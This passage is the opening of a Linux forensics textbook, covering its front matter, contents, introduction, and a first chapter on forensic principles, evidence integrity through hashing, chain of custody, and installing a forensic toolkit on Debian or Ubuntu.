Linux Forensics is the most comprehensive and up-to-date resource for those wishing to quickly and efficiently perform forensics on Linux systems. It is also a great asset for anyone that would like to better understand Linux internals. It will guide you step by step through the process of investigating a computer running Linux. Everything you need to know from the moment you receive the call from someone who thinks they have been attacked until the final report is written is covered in this book. All of the tools discussed in this book are free and most are also open source.
Linux Forensics
Copyright (c) 2015 by Pentester Academy
All rights reserved. No part of this publication may be reproduced, stored in a retrieval system, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law.
Although every precaution has been taken to verify the accuracy of the information contained herein, the author and publisher assume no responsibility for any errors or omissions. No liability is assumed for damages that may result from the use of information contained within.
First published: July 2015
Published by Pentester Academy, a division of Binary Security Innovative Solutions Pvt. Ltd.
http://www.PentesterAcademy.com
First Edition
Contents
Acknowledgements
Author Biography
Foreword
Scripts, Videos, Teaching Aids, Community Forums and more
Introduction
CHAPTER 1 First Steps
INFORMATION IN THIS CHAPTER:
WHAT IS FORENSICS?
TYPES OF FORENSICS
WHY LINUX FORENSICS?
GENERAL PRINCIPLES
Maintaining Integrity
Chain of Custody
Standard Practices
Documentation
PHASES OF INVESTIGATION
Evidence Preservation and Collection
Evidence Searching
Reconstruction of Events
HIGH-LEVEL PROCESS
Every Child is Perfect, Just Ask The Parents
BUILDING A TOOLKIT
Hardware
Software
Running live Linux in a virtual machine
SUMMARY
CHAPTER 2 Determining If There Was an Incident
INFORMATION IN THIS CHAPTER:
OPENING A CASE
TALKING TO USERS
DOCUMENTATION
If you are using a virtual machine, older may be better
MOUNTING KNOWN-GOOD BINARIES
MINIMIZING DISTURBANCE TO THE SUBJECT SYSTEM
Using a USB drive to store data
Using Netcat
Sending data from the subject system
Sending files
USING SCRIPTING TO AUTOMATE THE PROCESS
Scripting the server
Scripting the client
Short circuiting is useful in many places
INTRODUCING OUR FIRST SUBJECT SYSTEM
COLLECTING VOLATILE DATA
Date and time information
Operating system version
Network interfaces
Network connections
Open ports
Programs associated with various ports
Open Files
Running Processes
Routing Tables
Mounted filesystems
Loaded kernel modules
Users past and present
Putting it together with scripting
SUMMARY
CHAPTER 3 Live Analysis
INFORMATION IN THIS CHAPTER:
THERE WAS AN INCIDENT: NOW WHAT?
GETTING FILE METADATA
USING A SPREADSHEET PROGRAM TO BUILD A TIMELINE
EXAMINING USER COMMAND HISTORY
GETTING LOG FILES
COLLECTING FILE HASHES
DUMPING RAM
RAM acquisition methods
Building LiME
Using LiME to dump RAM
SUMMARY
CHAPTER 4 Creating Images
INFORMATION IN THIS CHAPTER:
SHUTTING DOWN THE SYSTEM
Normal shutdown
Pulling the plug
IMAGE FORMATS
Raw format
Proprietary format with embedded metadata
Proprietary format with metadata in a separate file
Raw format with hashes stored in a separate file
USING DD
USING DCFLDD
HARDWARE WRITE BLOCKING
SOFTWARE WRITE BLOCKING
Udev rules
Live Linux distributions
CREATING AN IMAGE FROM A VIRTUAL MACHINE
CREATING AN IMAGE FROM A PHYSICAL DRIVE
SUMMARY
CHAPTER 5 Mounting Images
INFORMATION IN THIS CHAPTER:
PARTITION BASICS
MASTER BOOT RECORD PARTITIONS
EXTENDED PARTITIONS
GUID PARTITIONS
MOUNTING PARTITIONS FROM AN IMAGE FILE ON LINUX
USING PYTHON TO AUTOMATE THE MOUNTING PROCESS
MBR-based primary partitions
Scripting or Programming Language
MBR-based extended partitions
GPT partitions
SUMMARY
CHAPTER 6 Analyzing Mounted Images
INFORMATION IN THIS CHAPTER:
GETTING MODIFICATION, ACCESS, AND CREATION TIMESTAMPS
IMPORTING INFORMATION INTO LIBREOFFICE
IMPORTING DATA INTO MySQL
When tools fail you
CREATING A TIMELINE
EXAMINING BASH HISTORIES
EXAMINING SYSTEM LOGS
EXAMINING LOGINS AND LOGIN ATTEMPTS
OPTIONAL – GETTING ALL THE LOGS
SUMMARY
CHAPTER 7 Extended Filesystems
INFORMATION IN THIS CHAPTER:
EXTENDED FILESYSTEM BASICS
SUPERBLOCKS
EXTENDED FILESYSTEM FEATURES
Compatible Features
Incompatible features
Read-only compatible features
USING PYTHON
Reading the superblock
Reading block group descriptors
Combining superblock and group descriptor information
FINDING THINGS THAT ARE OUT OF PLACE
INODES
Reading inodes with Python
Inode extensions and details
Going from an inode to a file
Extents
Directory entries
Extended attributes
JOURNALING
SUMMARY
CHAPTER 8 Memory Analysis
INFORMATION IN THIS CHAPTER:
VOLATILITY
CREATING A VOLATILITY PROFILE
GETTING PROCESS INFORMATION
PROCESS MAPS AND DUMPS
GETTING BASH HISTORIES
VOLATILITY CHECK COMMANDS
GETTING NETWORKING INFORMATION
GETTING FILESYSTEM INFORMATION
MISCELLANEOUS VOLATILITY COMMANDS
SUMMARY
CHAPTER 9 Dealing with More Advanced Attackers
INFORMATION IN THIS CHAPTER:
SUMMARY OF THE PFE ATTACK
THE SCENARIO
INITIAL LIVE RESPONSE
MEMORY ANALYSIS
FILESYSTEM ANALYSIS
LEVERAGING MYSQL
MISCELLANEOUS FINDINGS
SUMMARY OF FINDINGS AND NEXT STEPS
SUMMARY
CHAPTER 10 Malware
INFORMATION IN THIS CHAPTER:
IS IT MALWARE?
The file command
Is it a known-bad file?
Using strings
Listing symbol information with nm
Listing shared libraries with ldd
I THINK IT IS MALWARE
Getting the big picture with readelf
Using objdump to disassemble code
DYNAMIC ANALYSIS
Tracing system calls
Tracing library calls
Using the GNU Debugger for reverse engineering
OBFUSCATION
SUMMARY
CHAPTER 11 The Road Ahead
INFORMATION IN THIS CHAPTER:
NOW WHAT?
COMMUNITIES
LEARNING MORE
CONGREGATE
CERTIFY
Acknowledgements
First and foremost I would like to thank my wife and children for allowing me to take the time to write this book. This book would never have happened without their support.
Many thanks to Vivek Ramachandran and the whole Pentester Academy team for honoring me twice. First, I had the privilege of being the first external trainer for Pentester Academy. Second, I was granted the ability to author the first book ever published by Pentester Academy.
My deepest thanks go to Dr. Susan Baker for graciously offering to read this entire book and serve as copy editor.
Finally, I would like to thank my many supportive friends in the information security community who have provided encouragement to me throughout the years.
Author Biography
Dr. Philip Polstra (known to his friends as Dr. Phil) is an internationally recognized hardware hacker. His work has been presented at numerous conferences around the globe including repeat performances at DEFCON, BlackHat, 44CON, GrrCON, MakerFaire, ForenSecure, and other top conferences. Dr. Polstra is a well-known expert on USB forensics and has published several articles on this topic. He has developed a number of video courses including ones on Linux forensics, USB forensics, and reverse engineering.
Dr. Polstra has developed degree programs in digital forensics and ethical hacking while serving as a professor and Hacker in Residence at a private university in the Midwestern United States. He currently teaches computer science and digital forensics at Bloomsburg University of Pennsylvania. In addition to teaching, he provides training and performs penetration tests on a consulting basis. When not working, he has been known to fly, build aircraft, and tinker with electronics. His latest happenings can be found on his blog: http://polstra.org. You can also follow him at @ppolstra on Twitter.
Foreword
Hello All!
Phil and I met online around five years back through SecurityTube.net and we’ve been great friends ever since. Over the years, we discussed interesting projects we could collaborate on and information security education was on top of our list as expected. Based on our discussions, Phil created the excellent “USB Forensics” and “Linux Forensics” video series for Pentester Academy! Both video series were fantastic and well received by our students.
I’d always wanted to convert our online video series into books and Phil’s “Linux Forensics” video course seemed like the best place to start this adventure! And so we have! I’d like to take this opportunity to wish Phil and my publishing team at Pentester Academy bon voyage on this new endeavor!
Finally but most importantly, I’d like to thank the SecurityTube.net and Pentester Academy community and our students for their love and support over the years! We would not be here today without you guys! You’ve made all our dreams come true. We cannot thank you enough.
Vivek Ramachandran
Founder, SecurityTube.net and Pentester Academy
Scripts, Videos, Teaching Aids, Community Forums and more
Book website
We’ve created two mirror websites for the “Linux Forensics” book:
http://www.pentesteracademy.com/books
http://www.linuxforensicsbook.com
Scripts and Supporting Files
All Python and shell scripts have been made available for download on the website. We’ve tried our best to ensure that the code works and is error free, but if you find any bugs please report them and we will publicly acknowledge you on the website.
Videos
We are Pentester Academy and we love videos! Though the book is completely self-sufficient, we thought it would be fun to have videos for a select few labs by the book author himself! You can access these for FREE on the book website.
Community Forums
We would love to connect with our book readers, get their feedback, and learn from them firsthand what they would like to see in the next edition. Also, wouldn’t it be great to have a community forum where readers could interact with each other and even with the author? Our book community forums do just that! You can access the forums through the website mentioned above.
Teaching Aids
Are you a professor or a commercial trainer? Do you want to use this book in class? We’ve got you covered! Through our website, you can register as a trainer and get access to teaching aids such as presentations and exercise files.
Linux Forensics Book Swag!
Visit the swag section on our website and get your “Linux Forensics” T-Shirts, mugs, keychains and other cool swag!
Introduction
Information in This Chapter:
What this book is about
Intended audience
How this book is organized
What this book is about
This book is about performing forensic investigations on subject systems running the Linux operating system. In many cases Linux forensics is something that is done as part of incident response. That will be the focus of this book. That said, much of what you need to know in order to perform Linux incident response can also be applied to any Linux forensic investigation.
Along the way we will learn how to better use Linux and the many tools it provides. In addition to covering the essentials of forensics, we will explore how to use Python, shell scripting, and standard Linux system tools to more quickly and easily perform forensic investigations. Much of what is covered in this book can also be leveraged by anyone wishing to perform forensic investigations of Windows subjects on a Linux-based forensics workstation.
Intended audience
This book is primarily intended to be read by forensics practitioners and other information security professionals. It describes in detail how to investigate computers running Linux. Forensic investigators who work primarily with Windows subjects and would like to learn more about Linux should find this book useful. This book should also prove useful to Linux users and system administrators who are interested in the mechanics of Linux system breaches and ensuing investigations. The information contained within this book should allow a person to investigate the majority of attacks on Linux systems.
The only knowledge a reader of this book is assumed to have is that of a normal Linux user. You need not be a Linux system administrator, hacker, or power user to learn from this book. Knowledge of Linux system administration, Python, shell scripting, and Assembly would be helpful, but is definitely not required. Sufficient information will be provided for those new to these topics.
How this book is organized
This book begins with a brief introduction to forensics. From there we will delve into answering the question, “Was there an incident?” In order to answer this question, various live analysis tools and techniques will be presented. We then discuss the creation and analysis of forensic filesystem and memory images. Advanced attacks on Linux systems and malware round out our discussion.
Chapter 1: First Steps
Chapter 1 is an introduction to the field of forensics. It covers the various types of forensics and motivation for performing forensics on Linux systems. Phases of investigations and the high-level process are also discussed. Step-by-step instructions for building a Linux forensics toolkit are provided in this chapter.
Chapter 2: Was there an incident?
Chapter 2 walks you through what happens from the point where a client who suspects something has happened calls until you can be reasonably sure whether there was or was not an incident. It covers opening a case, talking to users, creating appropriate documentation, mounting known-good binaries, minimizing disturbance to the subject system, using scripting to automate the process, and collecting volatile data. A nice introduction to shell scripting is also provided in this chapter.
Chapter 3: Live Analysis
Chapter 3 describes what to do before shutting down the subject system. It covers capturing file metadata, building timelines, collecting user command histories, performing log file analysis, hashing, dumping memory, and automating with scripting. A number of new shell scripting techniques and Linux system tools are also presented in this chapter.
Chapter 4: Creating Images
Chapter 4 starts with a discussion of the options for shutting down a subject system. From there the discussion turns to tools and techniques used to create a forensic image of a filesystem. Topics covered include shutting down the system, image formats, using dd and dcfldd, hardware and software write blocking, and live Linux distributions. Methods of creating images for different circumstances are discussed in detail.
Chapter 5: Mounting Images
Chapter 5 begins with a discussion of the various types of partitioning systems: Master Boot Record (MBR) based partitions, extended partitions, and GUID partition tables. Linux commands and techniques used to mount all types of partitions are presented. The chapter ends with an introduction to Python and how it can be used to automate the process of mounting partitions.
Chapter 6: Analyzing Mounted Images
Chapter 6 describes how to analyze mounted filesystem images. It covers file metadata, command histories, system logs, and other common information investigated during dead analysis. Use of spreadsheets and MySQL to enhance investigations is discussed. Some new shell scripting techniques are also presented.
Chapter 7: Extended Filesystems
Chapter 7 is the largest chapter in this book. All aspects of Linux extended filesystems (ext2, ext3, and ext4) are discussed in detail. An extensive set of Python and shell scripts is presented in this chapter. Advanced techniques for detecting alterations of metadata by an attacker are provided in this chapter.
Chapter 8: Memory Analysis
Chapter 8 introduces the new field of memory analysis. The Volatility memory analysis framework is discussed in detail. Topics covered include creating Volatility profiles, getting process information, process maps and dumps, getting bash histories, using Volatility check plugins, retrieving network information, and obtaining in-memory filesystem information.
Chapter 9: Dealing with More Advanced Attackers
Chapter 9 walks you through a more sophisticated attack in detail. The techniques described up to this point in the book are applied to a new scenario. Reporting of findings to the client is also discussed.
Chapter 10: Malware
Chapter 10 provides an introduction to Linux malware analysis. It covers standard tools for investigating unknown files such as the file utility, hash databases, the strings utility, nm, ldd, readelf, objdump, strace, ltrace, and gdb. Obfuscation techniques are discussed. Safety issues are presented. An introduction to Assembly is also provided.
Chapter 11: The Road Ahead
In this final chapter several suggestions for further study are provided. General tips are also given for a successful career involving forensics.
Conclusion
Countless hours have been spent developing this book and accompanying scripts. It has been a labor of love, however. I hope you enjoy reading and actually applying what is in this book as much as I have enjoyed writing it.
For updates to this book and also my latest happenings consult my website http://philpolstra.com. You can also contact me via my Twitter account, @ppolstra. Downloads related to the book and other forms of community support are available at Pentester Academy http://pentesteracademy.com.
CHAPTER 1
First Steps
INFORMATION IN THIS CHAPTER:
What is forensics?
Types of forensics
Why Linux forensics?
General principles
Phases of investigation
High-level process
Building a toolkit
WHAT IS FORENSICS?
A natural question to ask yourself if you are reading a book on Linux forensics is: What is forensics anyway? If you ask different forensic examiners you are likely to receive slightly different answers to this question. According to a recent version of the Merriam-Webster dictionary: “Forensic (n) belonging to, used in, or suitable to courts of judicature or to public discussion and debate.” Using this definition of the word forensic my definition of forensic science is as follows:
Forensic science or forensics is the scientific collection of evidence of sufficient quality that it is suitable for use in court.
The key point to keep in mind is that we should be collecting evidence of sufficient quality that we can use it in court, even if we never intend to go to court with our findings. It is always easier to relax our standards than to tighten them later. We should also act like scientists, doing everything in a methodical and technically sound manner.
TYPES OF FORENSICS
When most people hear the term forensics they think about things they might have seen on shows such as CSI. This is what I refer to as physical forensics. Some of the more commonly encountered areas of physical forensics include fingerprints, DNA, ballistics, and blood spatter. One of the fundamental principles of physical forensics is Locard’s Transfer (or Exchange) Principle. Locard essentially said that if objects interact, they transfer (or exchange) material. For example, if you hit something with your car there is often an exchange of paint. As further examples, when you touch a surface you might leave fingerprints and you might take dirt with you on your shoes when you leave an area.
This book covers what I would refer to as digital forensics. Some like the term computer forensics, but I prefer digital forensics as it is much broader. We live in a world that is increasingly reliant on electronic devices such as smart phones, tablets, laptops, and desktop computers. Given the amount of information many people store on their smart phones and other small devices, it is often useful to examine those devices if someone is suspected of some sort of crime. The scope of this book is limited to computers (which could be embedded) running a version of Linux.
There are many specializations within the broader space of digital forensics. These include network forensics, data storage forensics, small device forensics, computer forensics, and many other areas. Within these specializations there are further subdivisions. It is not unusual for forensic examiners to be highly specialized. My hope is that by the time you finish this book you will be proficient enough with Linux forensics to perform investigations of all but the most advanced attacks on Linux systems.
WHY LINUX FORENSICS?
Presumably if you are reading this you see the value in learning Linux forensics. The same may not be true of your boss and others, however. Here is some ammunition for them on why you might benefit from studying Linux forensics.
While Linux is not the most common operating system on the desktop, it is present in many places. Even in the United States, where Windows tends to dominate the desktops, many organizations run Linux in the server room. Linux is the choice of many Internet Service Providers (ISPs) and large companies such as Google (they even have their own flavor of Linux). Linux is also extremely popular in development organizations.
Linux is the standard choice for anyone working in information security or forensics. As the operating system “by programmers for programmers,” it is very popular with black hat hackers. If you find yourself examining the black hat’s computer, it is likely running Linux.
Many devices all around us are running some version of Linux. Whether it is the wireless access point that you bought at the local electronics store or the smart temperature controller keeping your home comfortable, they are likely running Linux under the hood. Linux also shares some heritage and functionality with Android and OS X.
Linux is also a great platform for performing forensics on Windows, OS X, Android or other systems. The operating system is rich with free and open source tools for performing forensics on devices running virtually every operating system on the planet. If your budget is limited, Linux is definitely the way to go.
GENERAL PRINCIPLES
There are a number of general guiding principles that should be followed when practicing forensics. These include maintaining the integrity of evidence, maintaining the chain of custody, following standard practice, and fully documenting everything. These are discussed in more detail below.
Maintaining Integrity
It is of the utmost importance that evidence not be altered while it is being collected and examined. We are fortunate in digital forensics that we can normally make an unlimited number of identical copies of evidence. Those working with physical forensics are not so lucky. In fact, in many cases difficult choices must be made when quantities of physical evidence are limited as many tests consume evidence.
The primary method of ensuring integrity of digital evidence is hashing. Hashing is widely used in computer science as a way of improving performance. A hash function, generally speaking, takes an input of variable size and outputs a number of known size. Hashing allows for faster searches because computers can compare two numbers in one clock cycle versus iterating over every character in a long string, which could require hundreds or thousands of clock cycles.
Using hash functions in your programs can add a little complication because more than one input value can produce the same hash output. When this happens we say that a collision has occurred. Collisions are a complication in our programs, but when we are using hashes for encryption or integrity checking the possibility of many collisions is unacceptable. To minimize the number of collisions we must use cryptographic hash functions.
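To make the idea of a collision concrete, here is a minimal sketch in Python. The toy_hash function is a hypothetical, deliberately weak hash invented for this illustration (it is not one of the book's scripts); it is compared with SHA256 from Python's standard hashlib module.

```python
import hashlib


def toy_hash(data: bytes) -> int:
    """Hypothetical weak hash: the sum of the byte values modulo 256."""
    return sum(data) % 256


first, second = b"ab", b"ba"

# The toy hash ignores byte order, so these two different inputs collide.
toy_collision = toy_hash(first) == toy_hash(second)

# A cryptographic hash produces different digests for the same two inputs.
sha_collision = hashlib.sha256(first).digest() == hashlib.sha256(second).digest()

print(toy_collision, sha_collision)  # prints: True False
```

A weak hash like this may be acceptable for spreading keys across a table, but it would be useless for proving that an image is unaltered, since rearranging bytes leaves the hash unchanged.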
There are several cryptographic hash functions available. Some people still use the Message Digest 5 (MD5) algorithm to verify integrity of images. The MD5 algorithm is no longer considered to be secure and the Secure Hash Algorithm (SHA) family of functions is preferred. The original version is referred to as SHA1 (or just SHA). SHA2 is currently the most commonly used variant and you may encounter references to SHA224 (224 bits), SHA256 (256 bits), SHA384 (384 bits), and SHA512 (512 bits). There is a SHA3 algorithm, but its use is not yet widespread. I normally use SHA256, which is a good middle ground offering good performance with low chances of collisions.
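The output sizes mentioned above can be checked with Python's standard hashlib module. This is only an illustrative sketch; the digest_bits name is made up for the example.

```python
import hashlib

# Map each SHA variant to the size of its output in bits.
digest_bits = {
    name: hashlib.new(name).digest_size * 8
    for name in ("sha1", "sha224", "sha256", "sha384", "sha512")
}

for name, bits in digest_bits.items():
    print(f"{name}: {bits} bits")

# Input length does not affect output length: both digests are 64 hex characters.
short_digest = hashlib.sha256(b"a").hexdigest()
long_digest = hashlib.sha256(b"a" * 1_000_000).hexdigest()
print(len(short_digest), len(long_digest))
```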
We will discuss the details of using hashing in future chapters. For now the high level process is as follows. First, calculate a hash of the original. Second, create an image which we will treat as a master copy. Third, calculate the hash of the copy and verify that it matches the hash of the original. Fourth, make working copies of your master copy. Analysis is performed only on working copies; the original should not be touched again, and the master copy should be used only to create further working copies. While it may seem strange, the hash on working copies should be periodically recalculated as a double check that the investigator did not alter the image.
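The four steps can be sketched in Python as follows. This is a simplified illustration under stated assumptions, not the procedure used later in the book: a small temporary file stands in for the subject media, shutil.copyfile stands in for a real imaging tool such as dd or dcfldd, and the names sha256_file and copy_and_verify are hypothetical.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large images need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def copy_and_verify(source: Path, destination: Path) -> str:
    """Copy source to destination and confirm both hash to the same value."""
    source_hash = sha256_file(source)
    shutil.copyfile(source, destination)
    if sha256_file(destination) != source_hash:
        raise ValueError(f"hash mismatch copying {source} to {destination}")
    return source_hash


with tempfile.TemporaryDirectory() as workdir:
    work = Path(workdir)
    original = work / "original.bin"  # stand-in for the subject media
    original.write_bytes(b"evidence" * 1024)
    master = work / "master.img"
    working = work / "working.img"

    original_hash = copy_and_verify(original, master)  # steps one to three
    master_hash = copy_and_verify(master, working)     # step four
    # Periodic recheck: the working copy should still match the original.
    recheck_ok = sha256_file(working) == original_hash

print(original_hash == master_hash, recheck_ok)  # prints: True True
```

Reading in chunks matters in practice because disk images are routinely far larger than available RAM.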
Chain of Custody
Physical evidence is often stored in evidence bags. Evidence bags either incorporate a chain of custody form or have such a form attached to them. Each time evidence is removed from the bag the form is updated with who touched the evidence and what was done. The collection of entries on this form makes up the chain of custody. Essentially the chain of custody is a guarantee that the evidence has not been altered and has been properly maintained.
In the case of digital forensics the chain of custody is still important. While we can make unlimited digital copies, we must still maintain the integrity of the original. This is also why a master copy should be made that is never used for any purpose other than creating working copies, as it prevents the need to touch the original other than for the one-time event of creating the master copy.
Standard Practices
Following standard practices makes your investigation easier. By following a written procedure accurately there is less explaining to do if you should find yourself in court. You are also less likely to forget something or make a mistake. Additionally, if you follow standard practices there is less documentation that has to be done. It used to be said that “nobody was ever fired for buying IBM.” Similarly, no forensic investigator ever got into trouble using written procedures that conform to industry standard practice.
Documentation
When in doubt, document. It never hurts to overdo the documentation. As mentioned previously, if you follow standard written procedures you can reference them as opposed to repeating them in your notes. Speaking of notes, I recommend handwritten notes in a bound notebook with numbered pages. This might sound strange to readers who are used to using computers for everything, but it is much quicker to jot notes onto paper. It is also easier to carry a set of handwritten notes to court.
The bound notebook has other advantages as well. No power is required to view these notes. The use of a bound notebook with numbered pages also makes it more difficult to alter your notes. Not that you would alter them, but a lawyer might not be beyond accusing you of such a thing. If you have difficulty finding a notebook with numbered pages you can number them yourself before use.
If you can work with someone else it is ideal. Pilots routinely use checklists to make sure they don’t miss anything. Commercial pilots work in pairs as extra insurance against mistakes. Working with a partner allows you to have a second set of eyes, lets you work more quickly, and also makes it even harder for someone to accuse you of tampering with evidence. History is replete with examples of people who have avoided conviction by accusing someone of evidence tampering and instilling sufficient doubt in a jury.
Few people love to do documentation. This seems to be true to a greater extent among technical people. There are some tools that can ease the pain of documenting your findings that will be discussed in later chapters of this book. An investigation is never over until the documentation is finished.
PHASES OF INVESTIGATION
There are three phases to a forensic investigation: evidence preservation, evidence searching, and event reconstruction. It is not unusual for there to be some cycling between the phases as an investigation proceeds. These phases are described in more detail below.
Evidence Preservation and Collection
Medical professionals have a saying: “First do no harm.” For digital forensics practitioners our motto should be “Don’t alter the data.” This sounds simple enough. In actuality it is a bit more complicated as data is volatile. There is a hierarchy of volatility that exists in data found in any system.
The most volatile data can be found in CPU registers. These registers are high speed scratch memory locations. Capturing their contents is next to impossible. Fortunately, there is little forensic value in these contents. CPU caches are the next level down in terms of volatility. Like registers they are hard to capture and also, thankfully, of little forensic value.
Slightly less volatile than storage in the CPU are buffers found in various devices such as network cards. Not all input/output devices have their own storage buffers. Some low-speed devices use main system memory (RAM) for buffering. As with data stored in the CPU, this data is difficult to capture. In theory, anything stored in these buffers should be replicated in system memory assuming it came from or was destined for the target computer.
System memory is also volatile. Once power has been lost, RAM is cleared. When compared to previously discussed items, system memory is relatively easy to capture. In most cases it is not possible to collect the contents of system memory without changing memory contents slightly. An exception to this would be hardware-based memory collection. Memory acquisition will be discussed in greater detail in a later chapter.
Due to limitations in technology, until recently much of digital forensics was focused on “dead analysis” of images from hard drives and other media. Even when dealing with non-volatile media, volatility is still an issue. One of the oldest questions in computer security and forensics is whether or not to pull the plug on a system you suspect has been compromised.
Pulling the plug can lead to data loss as anything cached for writing to media will disappear. On modern journaling filesystems (by far the most common situation on Linux systems today) this is less of an issue as the journal can be used to correct any corruption. If the system is shut down in the normal manner some malware will attempt to cover its tracks or, even worse, destroy other data on the system.
Executing a normal shutdown has the advantage of flushing buffers and caches. As previously mentioned, the orderly shutdown is not without possible disadvantages. As with many things in forensics, the correct answer as to which method is better is, “it depends.” There are methods of obtaining images of hard drives and other media which do not require a system shutdown, which further complicates this decision. Details of these methods will be presented in future chapters.
Evidence Searching
Thanks to the explosion of storage capacity it becomes harder to locate evidence within the sea of data stored in a typical computer with each passing year. Data exists at three levels: data, information, and evidence, as shown in Figure 1.1.
FIGURE 1.1
The data hierarchy.
As shown in Figure 1.1, the lowest level of data is just raw data. Raw data consists of bits, normally organized as bytes, in volatile or non-volatile storage. In this category we find things such as raw disk sectors. It can be a challenge to use data at this level and on most modern systems there is plenty of data out there to pick through.
Above raw data we have information. Information consists of raw data with some sort of meaning attached to it. For example, an image has more meaning to a human than the bits that make up a JPEG file used to store the image. Even text files exist at this level in our hierarchy. Bringing many bytes of ASCII or Unicode values together gives them meaning beyond their collection of bytes.
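As a small illustration of the step from raw data to information, the Python sketch below interprets the same kind of raw bytes in two ways. The byte values and the looks_like_jpeg helper are chosen for this example only; the check relies on the fact that JPEG files begin with the bytes FF D8 FF.

```python
# Five raw bytes, as they might appear in a disk sector.
raw = bytes([0x4C, 0x69, 0x6E, 0x75, 0x78])

# Interpreting the bytes as ASCII attaches meaning to them.
text = raw.decode("ascii")
print(text)  # prints: Linux


def looks_like_jpeg(data: bytes) -> bool:
    """Return True if the data starts with the JPEG signature bytes."""
    return data.startswith(b"\xff\xd8\xff")


print(looks_like_jpeg(b"\xff\xd8\xff\xe0" + b"\x00" * 16))  # prints: True
print(looks_like_jpeg(raw))                                 # prints: False
```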
At the highest level in our hierarchy is evidence. While there may be thousands or millions of files (collections of information) it is unlikely that the bulk of them have any relevance to an investigation. This leads us to ponder what it means for information to be relevant to an investigation.
As previously mentioned, forensics is a science. Given that we are trying to do science, we should be developing hypotheses and then searching for information that supports or refutes a hypothesis. It is important to remain objective during an investigation as the same piece of evidence might be interpreted differently based on people’s preconceived notions.
It is extremely important that investigators do not become victims of confirmation bias. Put simply, confirmation bias is only looking at information that supports what you believe to be true while discounting anything that would refute what you believe. Given the amount of data that must be examined in a typical investigation, a hypothesis or two concerning what you think you will find (the owner of the computer did X, this computer was successfully exploited, etc.) is good to help guide you through the searching process. Don’t fall into the trap of assuming your hypothesis or hypotheses are correct, however.
CONFIRMATION BIAS IN ACTION
Every Child is Perfect, Just Ask The Parents
One of the best stories to describe confirmation bias goes as follows. Johnny loved magicians. One day his parents took him to see a famous magician, Phil the Great. At the end of the show the parents told Phil how much their son loved magic. Phil then offered to show them a trick. Johnny eagerly accepted.
The magician proceeded to pull out a coin and move it back and forth between both hands, then closed his fists and held out his hands. He asked Johnny to identify the hand containing the coin, which he did correctly. Now guessing correctly one time is not much of a feat, but this game was repeated many times and each time Johnny correctly guessed the hand containing the coin. While this was going on the magician made comments like, “You must have excellent vision to see which hand contains the coin,” and “You must be an expert on reading my facial expressions and that is how you know where the coin is.”
Eventually Johnny had correctly identified the hand with the coin fifty times in a row! His parents were amazed. They called the grandparents and told all of their friends about it on Facebook, Twitter, and other social media sites. When they finally thanked the magician and turned to leave, he shouted, “goodbye,” and waved with both hands. Each hand contained a coin.
It was the parents’ confirmation bias that led them to believe what they wanted to believe, that Johnny was a savant, and distracted them from the truth, that the magician was indeed tricking them. Remain objective during an investigation. Don’t let what you or your boss want to be true keep you from seeing contrary evidence.
Reconstruction of Events
In my mind trying to reconstruct what happened is the most fun part of an investigation. The explosion in size of storage media might make the searching phase longer than it was in the past, but that only helps to make the reconstruction phase that much more enjoyable. It is very unlikely that you will find all the evidence you need for your event reconstruction in one place. It is much more common to get little pieces of evidence from multiple places which you put together into a larger picture. For example, a suspicious process in a process list stored in a memory image might lead you to look at files in a filesystem image, which might lead you back to an open file list in the memory image, which in turn points toward files in the filesystem image. Putting all of these bits together might allow you to determine when and by whom a rootkit was downloaded and when and by which user it was subsequently installed.
HIGH-LEVEL PROCESS
While not every Linux forensic investigation is part of an incident response, incident response will be the focus of this book. The justification for this is that the vast majority of Linux forensic investigations are conducted after a suspected breach. Additionally, many of the items discussed in this book will be relevant to other Linux investigations as well. The high-level process for incident response is shown in Figure 1.2.
FIGURE 1.2
High-level Process for Linux Incident Response
As can be seen in Figure 1.2, it all begins with a call. Someone believes that a breach (or something else) has occurred and they have called you to investigate. Your next step is to determine whether or not there was a breach. A small amount of live analysis might be required in order to make this determination. If no breach occurred, you get to document what happened and add this to your knowledge base.
If there was an incident, you would normally start with live analysis before deciding whether or not dead analysis is justified. If you deem it necessary to perform the dead analysis you need to acquire some images and then actually perform the analysis. Whether or not you performed a dead analysis it isn’t over until the reports are written. All of these steps will be discussed in detail in future chapters.
BUILDING A TOOLKIT
In order to do Linux forensics effectively you might want to acquire a few tools. When it comes to software tools you are in luck as all of the Linux forensics tools discussed in this book are free (most are also open source). In addition to the notebook discussed previously, some hardware and software should be in every forensic investigator’s toolkit.
Hardware
You will likely want one or more external hard drives for making images (both RAM and hard disks). External hard drives are preferred as it is much easier to share with other investigators when they can just plug in a drive. USB 3.0 devices are the best as they are significantly faster than their USB 2.0 counterparts.
A write blocker is also helpful whenever an image is to be made of any media. Several hardware write blockers are available. Most of these are limited to one particular interface. If your budget affords only one hardware write blocker, I would recommend a SATA blocker as this is the most common interface in use at this time. Software write blockers are also a possibility. A simple software write blocker is presented later in this book.
Software
Software needs fall into a few categories: forensic tools, system binaries, and live Linux distributions. Ideally these tools are stored on USB 3.0 flash drives and perhaps a few DVDs if you anticipate encountering systems that cannot boot from a USB drive. Given how cheap USB flash drives are today, even investigators with modest budgets can be prepared for most situations.
There are a number of ways to install a set of forensics tools. The easiest method is to install a forensics oriented Linux distribution such as SIFT from SANS (http://digital-forensics.sans.org/community/downloads). Personally, I prefer to run my favorite Linux and just install the tools rather than be stuck with someone else’s themes and sluggish live system performance. The following script will install all of the tools found in SIFT on most Debian or Ubuntu based systems (unlike the SANS install script that works only on specific versions of Ubuntu).
#!/bin/bash
# Simple little script to load DFIR tools into Ubuntu and Debian systems
# by Dr. Phil Polstra @ppolstra
# create repositories
echo "deb http://ppa.launchpad.net/sift/stable/ubuntu trusty main" \
  > /etc/apt/sources.list.d/sift-ubuntu-stable-utopic.list
echo "deb http://ppa.launchpad.net/tualatrix/ppa/ubuntu trusty main" \
  > /etc/apt/sources.list.d/tualatrix-ubuntu-ppa-utopic.list
# list of packages
pkglist="aeskeyfind
afflib-tools
afterglow
aircrack-ng
arp-scan
autopsy
binplist
bitpim
bitpim-lib
bless
blt
build-essential
bulk-extractor
cabextract
clamav
cryptsetup
dc3dd
dconf-tools
dumbpig
e2fslibs-dev
ent
epic5
etherape
exif
